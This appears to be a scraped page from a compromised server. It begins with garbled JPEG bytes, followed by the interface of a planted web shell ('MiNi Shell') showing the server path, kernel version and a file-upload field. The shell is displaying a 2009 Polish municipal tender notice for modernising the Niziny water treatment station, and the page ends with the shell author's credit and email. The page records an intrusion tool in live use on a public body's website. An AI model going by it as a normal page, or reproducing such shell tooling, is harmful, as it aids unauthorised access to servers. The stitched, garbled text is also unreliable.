JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090303/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090303/47762-N-2009.html

<p class="kh_header"><b>Orły: Modernizacja Stacji Uzdatniania Wody w miejscowości Niziny, woj. podkarpackie</b><br>
<b>Numer ogłoszenia: 47762 - 2009; data zamieszczenia: 03.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orły , ul. Przemyska 3, 37-716 Orły, woj. podkarpackie, tel. 016 6712693, 6712694, faks 016 6712693.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> urzad@ugorly.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja Stacji Uzdatniania Wody w miejscowości Niziny, woj. podkarpackie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający na podstawie posiadanej dokumentacji projektowej zamierza zlecić wykonanie modernizacji istniejącej Stacji Uzdatniania Wody w miejscowości Niziny. W głównej mierze, modernizacji ( zmianie ) ulegną elementy wyposażenia technologicznego stacji. Efektem tych działań ma być poprawa jakości wody pitnej dla mieszkańców gminy. Podstawowy zakres modernizacji stacji obejmuje:
1/. roboty technologiczne - wymianę urządzeń uzdatniających, składających się na układ technologiczny:
- ujmowanie wody za pomocą istniejącej studni głębinowej
- napowietrzanie i odpowietrzanie wody
- dwustopniowa filtracja pośpieszna na filtrach z korektą odczynu przed drugim stopniem
- gromadzenie wody uzdatnionej w dwóch istniejących zbiornikach o pojemności 50m3 każdy
- pompowanie wody do sieci za pomocą zestawu pomp drugiego stopnia
- płukanie filtrów wodą uzdatnioną za pomocą wydzielonej popmpy płucznej.
Technologia ta realizowana będzie przy zastosowaniu następujących urządzeń : aerator statyczny fi 125, 2 filtry odżelaziające ciśnieniowe, 2 filtry odmanganiające ciśnieniowe, 1 sprężarka powietrza dla areacji i dla potrzeb AKPiA, 1 dmuchawa do spulchniania złoża filtracyjnego, 1 pompa wody płucznej, 1 zestaw dezynfekcji wody, 2 zbiorniki wody uzdatnionej, 1 zestaw pompowy do wysyłki wody do sieci.
2/. roboty instalacyjne - modernizację instalacji wody zimnej, ciepłej wody użytkowej, instalację kanalizacji sanitarnej, instalację odprowadzającą popłuczyny, instalację do osuszania pomieszczeń
3/. roboty ogólnobudowlane - przebudowę istniejących kanałów technologicznych oraz fundamentów pod zbiorniki filtracyjne, wymianę stolarki okiennej i drzwiowej, uzupełnienie tynków i licowanie ścian płytkami, malowanie ścian, roboty docieplające ścian.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.26-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 10.000 zł słownie; dziesięc tysięcy złotych ( w przypadku wpłaty gotówką, przelew na konto UG Orły Bank Spółdzielczy o/Orły 12 9113 1027 2005 3000 0045 0001 ) - wadium dotyczy wykonawców zaproszonych do składania ofert przetargowych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie publiczne mogą ubiegać się wykonawcy, którzy :
1/. Spełniają warunki określone w art. 22 ust.1 ustawy Pzp ( Dz.U. z 2007 r., Nr 223, poz. 1655 oraz z 2008 r., Nr 171, poz. 1058 z późniejszymi zmianami ), tj :
a/. posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia działalności lub czynności ( w przypadku wykonawców wspólnie ubiegających się o zamówienie, warunek musi być spełniony łącznie )
b/. posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny i osobowy ( kadrowy ), umożliwiający wykonanie zamówienia tj. wykonawcy którzy :
- w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali ( zrealizowali z należytą starannością ) co najmniej dwa zamówienia publiczne, które odpowiadały kompleksowo rodzajowi robót określonych w przedmiocie zamówienia a obejmujących budowę, przebudowę lub modernizację obiektów związanych z procesami uzdatniania wody pitnej dla ludności, na łączną wartość minimum 700.000 zł brutto. Realizowane zamówienia musiały być zrealizowane w terminach umownych i przyjęte przez zamawiających o których mowa w ustawie Pzp bez zastrzeżeń ( w przypadku wykonawców wspólnie ubiegających się o zamówienie, warunek mujsi być spełniony łącznie )
- zatrudniają osoby posiadające uprawnienia do pełnienia samodzielnych funkcji kierownika budowy w specjalnościach wynikających z zakresu przedmiotu zamówienia, w rozumieniu wymagań określonych przepisamu ustawy Prawo budowlane ( w przypadku wykonawców wspólnie ubiegających się o zamówienie, warunek musi być spełniony łącznie )
- posiadają potencjał techniczny, umożliwiający wykonanie zamówienia ( w przypadku wykonawców wspólnie ubiegających się o zamówienie, warunek musi być spełniony łącznie )
c/. znajdują się w sytuacji ekonomicznej i finansowej zapewniajacej wykonania zamówienia tj. wykonawcy którzy:
- udokumentują możliwość dysponowania środkami finansowymi w wysokości nie mniejszej niż 500.000 zł na bieżącą realizację przedmiotu zamówienia ( w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek musi być spełniony łącznie )
- udokumentują posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności ( związanej z przedmiotem zamówienia ) o wartości sumy ubezpieczenia nie niższej niż 100.000 zł na jedno zdarzenie ( w przypadku wykonawców wspólnie ubiegających o zamówienie, warunek musi być spełniony łącznie )
2. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 ustawy Pzp ( w przypadku wykonawców wspólnie ubiegających się o zamówienie, warunek musi być spełniony przez nich wszystkich odrębnie )
3/. Udzielą zamawiającemu na wykonane roboty budowlano-instalacyjne oraz technologiczne, gwarancji na okres nie krótszy niż 36 miesięcy.
II. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani są do :
1/. Posiadania pełnomocnictwa udzielonego liderowi przez wszystkich partnerów, dotyczące warunków ich reprezentowania w postępowaniu o udzielenie zamówienia publicznego oraz zawarcia umowy dotyczącej jego realizacji.
III. Ocena spełniania przez wykonawców warunków udziału w postępowaniu o udzielenie zamówienia, będzie dokonywana w następujący sposób :
1/. Spełnienie wymagań dotyczących posiadanych uprawnień, posiadania niezbędnej wiedzy i doświadczenia oraz potencjału technicznego i osobowego, sytuacji finansowej i ekonomicznej, nie podlegania wykluczeniu z postępowania - wg formuły spełnia/nie spełnia ( bez znaczenia punktowego ).
2/. Ocena realizacji robót budowlano-instalacyjnych i technologicznych, wykonanych w okresie ostatnich pięciu lat - wg kryterium wartość robót zrealizowanych, [( wartość robót wykonanych/wartość najwyższa robót wykonanych)] x 100 %, z zaokrągleniem wyniku do drugiego miejsca po przecinku ( wg zasad matematycznych ). Wartość robót zrealizowanych ( wykonanych ) będzie kwotą wyrażoną w walucie polskiej - PLN ( brutto ), ustaloną na podstawie informacji zawartych w dokumentach wykonawców. Do oceny tej, zamawiający przyjmie wyłącznie wartość robót związanych z realizacją robót wymienionych w rozdziale I pkt 1b. W przypadku uzyskania jednakowej ilości punktów, o miejscu na liście rankingowej decydować będzie dodatkowa punktacja , uwzględniająca ilość zrealizowanych obiektów, wg następujących zasad :
a/. za zrealizowanie dwóch zamówień             -       1 pkt
b/. za zrealizowanie od 3 do 5 zamówień         -       2 pkt
c/. za zrealizowanie więcej niż 5 zamówień      -       3 pkt
3/. Zamawiający ustala, że ilość wykonawców zaproszonych do złożenia oferty przetargowej, wyniesie 10. W przypadku złożenia wniosków o dopuszczenie do udziału w postępowaniu przez wykonawców spełniających warunki udziału w liczbie większej niż 10, zamawiający zaprosi do składania ofert tych wykonawców, którzy otrzymają najwyższą ocenę spełniania warunków. Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu będzie mniejsza niż określona w ogłoszeniu, zamawiający zaprosi do składania ofert wszystkich wykonawców spełniających te warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Dla potwierdzenia spełniania warunków udziału w postępowaniu, wykonawcy w oparciu o przepisy Rozporządzenia Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajuów dokumentów jakie może żądać zamawiający od wykonawców oraz form, w jakich te dokument mogą być składane ( Dz.U. z 2006 r., Nr 87, poz.605 oraz Dz.U. z 2008 r., Nr 188, poz. 1155 ), przedłożą:
1/. Aktualny odpis z właściwego rejestru albo kopię zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków odopuszczenie do udziału w postępowaniu.
2/. Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy pzp, wystawione nie wcześniej niż 6 miesięcy przed upływem termunu składania wniosków o dopuszczenie do udziału w postępowaniu
3/. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu lub oświadczenie wykonawcy, że informacja te go nie dotyczy
4/. Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego o nie zaleganiu z opłacaniem podatków lub zaświadczenie, że wykonawca uzyskał prawem przewidziane zwolnienie, odroczenie lub rozłożenie na raty zaległości lub wstrzymanie w całości wykonania decyzji organów podatkowych, wystawione nie wcześniej niż 3 miesiące przed terminem składania wniosków o dopuszczenie do udziału w postępowaniu
5/. Aktualne zaświadczenie z właściwego Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek i opłat na ubezpieczenie społeczne lub zaświadczenie, że uzyskał prawem przewidziane zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji tych organów, wystawione nie wcześniej niż 3 miesiące przed terminem składania wniosków o dopuszczenie do udziału w postępowaniu
6/. Oświadczenie, że wykonawca spełnia warunki określone w art.22 ust.1 ustawy pzp i nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego w trybie art. 24 ust.1,2 ustawy pzp
7/. Wykaz zrealizowanych obiektów na których realizował roboty budowlane tożsame z przedmiotem zamówienia, na podstawie zawartych umów o realizację zamówienia publicznego, za okres ostatnich 5 lat przed terminem składania wniosków o dopuszczeniem do udziału w postępowaniu, zawierające kolejno informacje :
a/. nazwę zadania i dane zamawiającego
b/. okres realizacji
c/. zakres przedmiotowy
d/. wartość jednostkową zadań wymienionych oraz ich wartość łączną, wyrażoną w PLN brutto wraz z referencjami zamawiających, potwierdzających ich wykonanie zgodnie z umową
8/. Informację o zatrudnionych osobach ( personelu ) posiadających wymagane przepisami Prawa budowlanego uprawnienia do pełnienia samodzielnych funkcji kierownika budowy dla poszczególnych elementów przedmiotu zamówienia wraz z kopią dokumentów potwierdzających ich posiadanie i wskazanie ich funkcji w okresie realizacji przedmiotu zamówienia lub pisemne zobowiązanie innego podmiotu, do udostępnienia osób zdolnych do wykonania zamówienia
9/. Informację o posiadanym sprzęcie, niezbędnym do realizacji przedmiotu zamówienia, zawierającą kolejno:
a/. nazwę sprzętu
b/. stopień własności ( własny - dzierżawa - leasing lub inny )
lub pisemne zobowiązanie innego podmiotu o udostępnieniu niezbędnych do wykonania zamówień, urządzeń i maszyn
10/. Informację z banku w którym wykonawca posiada konto, o posiadanych środkach finansowych lub zdolności kredytowej w wysokości nie mniejszej niż 500.000 zł, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu na składanie wniosków o dopuszczenie do udziału w postępowaniu
11/. Kopię polisy lub innego dokumentu potwierdzającego ubezpieczenie wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę nie mniejszą niż 100.000 zł na jedno zdarzenie
12/. Informację dotyczącą sytuacji finansowej wykonawcy za lata 2006,2007,2008, zawierającą następujące informacje :
a/. obroty z tytułu prowadzonej działalności inwestycyjno-wykonawczej
b/. zobowiązania
c/. należności
d/. zysk
13/. Pełnomocnictwo do reprezentowania wykonawców ubiegających się o wspólną realizację zamówienia
14/. Dla wykonawców o których mowa w pkt 13, oświadczenia i dokumenty wymienione w pkt 1-6,12 dla każdego z nich osobno, pozostałe łącznie.
Dokumentu należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem, przez wykonawcę.
Zamawiający nie ustala wzoru wniosku o dopuszczenie do udziału w postępowaniu.
II. Wykonawcy zamieszkali poza terytorium Rzeczypospolitej Polskiej - jeżeli siedziba firmy lub miejsce zamieszkania jest poza terytorium RP, dokumenty o których mowa w pkt I ust.1,4,5 składają w formie, jakie są wydawane one zgodnie z prawem kraju właściwym ze względu na zamieszkanie - siedzobę. Muszą one jednoznacznie wskazywać na:
a/. Nie wszczęcie procesu likwidacji ani ogłoszenia upadłości
b/. Nie orzeczenia wobec niego zakazu ubiegania się o zamówienia
c/. Nie zalegania z wszelkiego typu należnościami z tytułu podatków,ubezpieczeń społecznych lub zdrowotnych albo posiadaniu przewidzianych prawem zwolnień, odroczeń lub rozłożenia ich płatności na raty lub wstrzymania w całości ich decyzji
d/. Jeżeli w kraju pochodzenia osoby lub właściwego dla miejsca zamieszkania, siedziby firmy, nie wydaje się dokumentów o których mowa w pkt c, zastępuje się je dokumentem zawierającym oświadczenie wykonawcy złożone przed organem właściwym do potwierdzenia takiego oświadczenia
III. Dokumenty i oświadczenia składające się na wniosek o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego, muszą być podpisane przez osobę upoważnioną do występowania w imieniu wykonawcy ( uprawnienie zgodne z odpisem z Krajowego Rejestru Sądowego lub zaświadczeniem o wpisie do ewidencji działalności gospodarczej albo przez osobę umocowaną przez osobę uprawnioną ), a w przypadku składania wspólnego wniosku - przez ustanowionego pełnomocnika wykonawców składających wniosek o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego.
IV. Poprawki muszą być naniesione czytelnie i opatrzone podpisem osoby upoważnionej.
V.  Każdy wykonawca może złożyć tylko jeden wniosek o dopuszczenie do udziału w postępowaniu, w trwale zamknietej kopercie, w której znajdować się będzie koperta wewnętrzna opatrzona pieczątką identyfikacyjną wykonawcy.
VI. Koperty powinny być zaadresowane na adres :
Gmina Orły 37-716 Orły ul. Przemyska 3
Wniosek o dopuszczenie do udziału w postępowaniu - modernizacja Stacji Uzdatniania Wody w miejscowosci Niziny
Nie otwierać przed terminem składania wniosków o dopuszczenie do udziału w postępowaniu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 10.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> nie dotyczy.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia zostanie przekazana wykonawcom wraz z zaproszeniem do złożenia oferty przetargowej. Specyfikacja zostanie przekazana niedopłatnie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2009 godzina 12:00, miejsce: Sekretariat Urzędu Gminy Orły, 37-716 Orły ul. Przemyska 3 ( pokój nr 15 I-sze pietro ).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com